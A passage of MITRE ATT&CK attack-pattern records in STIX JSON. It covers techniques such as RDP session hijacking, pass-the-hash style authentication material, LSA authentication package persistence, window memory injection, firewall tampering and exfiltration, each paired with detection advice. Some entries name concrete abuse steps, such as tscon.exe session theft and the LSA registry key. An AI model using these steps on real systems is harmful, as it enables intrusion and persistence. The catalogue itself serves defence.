"https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/"}, {"source_name": "VirusTotal FAQ", "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.", "url": "https://www.virustotal.com/en/faq/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-04-28T15:43:30.271Z", "name": "Use Alternate Authentication Material", "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system\u2014either in memory or on disk\u2014it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Blake Strom, Microsoft Threat Intelligence", "Pawel Partyka, Microsoft Threat Intelligence"], "x_mitre_deprecated": false, "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365", "SaaS", "Google Workspace", "IaaS", "Containers"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["System Access Controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "created": "2020-01-30T16:18:36.873Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1550", "external_id": "T1550"}, {"source_name": "TechNet Audit Policy", "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx"}, {"source_name": "NIST Authentication", "description": "NIST. (n.d.). Authentication. Retrieved January 30, 2020.", "url": "https://csrc.nist.gov/glossary/term/authentication"}, {"source_name": "NIST MFA", "description": "NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January 30, 2020.", "url": "https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Remote Desktop Protocol", "description": "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.\n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)\n\nAdversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, c:\\windows\\system32\\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matthew Demaske, Adaptforward"], "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nAlso, set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Remote Desktop Users", "User"], "x_mitre_system_requirements": ["RDP service enabled, account in the Remote Desktop Users group."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484", "created": "2017-05-31T21:30:59.769Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1076", "external_id": "T1076"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/555.html", "external_id": "CAPEC-555"}, {"source_name": "TechNet Remote Desktop Services", "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx"}, {"source_name": "Alperovitch Malware", "description": "Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.", "url": "http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/"}, {"source_name": "RDP Hijacking Korznikov", "description": "Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.", "url": "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html"}, {"source_name": "RDP Hijacking Medium", "description": "Beaumont, K. (2017, March 19). RDP hijacking\u200a\u2014\u200ahow to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.", "url": "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6"}, {"source_name": "Kali Redsnarf", "description": "NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.", "url": "https://github.com/nccgroup/redsnarf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Threat Intel Vendors", "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", "created": "2020-10-02T17:03:45.918Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1597/001", "external_id": "T1597.001"}, {"source_name": "D3Secutrity CTI Feeds", "description": "Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.", "url": "https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-09-11T16:06:10.376Z", "name": "Exfiltration Over Other Network Medium", "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Itzik Kotler, SafeBreach"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "created": "2017-05-31T21:30:25.159Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1011", "external_id": "T1011"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Network Device Configuration Dump", "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", "created": "2020-10-20T00:08:21.745Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1602/002", "external_id": "T1602.002"}, {"source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}, {"source_name": "US-CERT TA18-068A 2018", "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-19T04:27:00.005Z", "name": "Gather Victim Identity Information", "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)", "Obsidian Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "created": "2020-10-02T14:54:59.263Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1589", "external_id": "T1589"}, {"source_name": "OPM Leak", "description": "Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020.", "url": "https://www.opm.gov/cybersecurity/cybersecurity-incidents/"}, {"source_name": "Detectify Slack Tokens", "description": "Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.", "url": "https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/"}, {"source_name": "GitHub truffleHog", "description": "Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.", "url": "https://github.com/dxa4481/truffleHog"}, {"source_name": "GrimBlog UsernameEnum", "description": "GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.", "url": "https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/"}, {"source_name": "Register Uber", "description": "McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.", "url": "https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/"}, {"source_name": "GitHub Gitrob", "description": "Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.", "url": "https://github.com/michenriksen/gitrob"}, {"source_name": "CNET Leaks", "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.", "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/"}, {"source_name": "Obsidian SSPR Abuse 2023", "description": "Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.", "url": "https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/"}, {"source_name": "Forbes GitHub Creds", "description": "Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.", "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196"}, {"source_name": "Register Deloitte", "description": "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", "url": "https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Authentication Package", "description": "Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=. The binary will then be executed by the system when the authentication packages are loaded.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--52d40641-c480-4ad5-81a3-c80ccaddf82d", "created": "2017-05-31T21:31:43.135Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1131", "external_id": "T1131"}, {"source_name": "MSDN Authentication Packages", "description": "Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx"}, {"source_name": "Graeber 2014", "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html"}, {"source_name": "Microsoft Configure LSA", "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Extra Window Memory Injection", "description": "Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process\u2019s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process\u2019s EWM.\n\nExecution granted through EWM injection may take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Anti-virus", "Host intrusion prevention systems", "Data Execution Prevention"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--52f3d5a6-8a0f-4f82-977e-750abf90d0b0", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1181", "external_id": "T1181"}, {"source_name": "Microsoft Window Classes", "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx"}, {"source_name": "Microsoft GetWindowLong function", "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx"}, {"source_name": "Microsoft SetWindowLong function", "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "MalwareTech Power Loader Aug 2013", "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.", "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html"}, {"source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/"}, {"source_name": "Microsoft SendNotifyMessage function", "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-03-28T00:01:08.337Z", "name": "Disable or Modify System Firewall", "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)\n\nAdversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Firewall"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "created": "2020-02-21T21:00:48.814Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/004", "external_id": "T1562.004"}, {"source_name": "Huntress BlackCat", "description": "Carvey, H. (2024, February 28). BlackCat Ransomware Affiliate TTPs. Retrieved March 27, 2024.", "url": "https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps"}, {"source_name": "change_rdp_port_conti", "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved March 1, 2022.", "url": "https://twitter.com/TheDFIRReport/status/1498657772254240768"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Network Service Scanning", "description": "Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on [https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml specific port numbers], the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is [https://nmap.org/ Nmap].\n\nAn adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to .\n\nScanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": 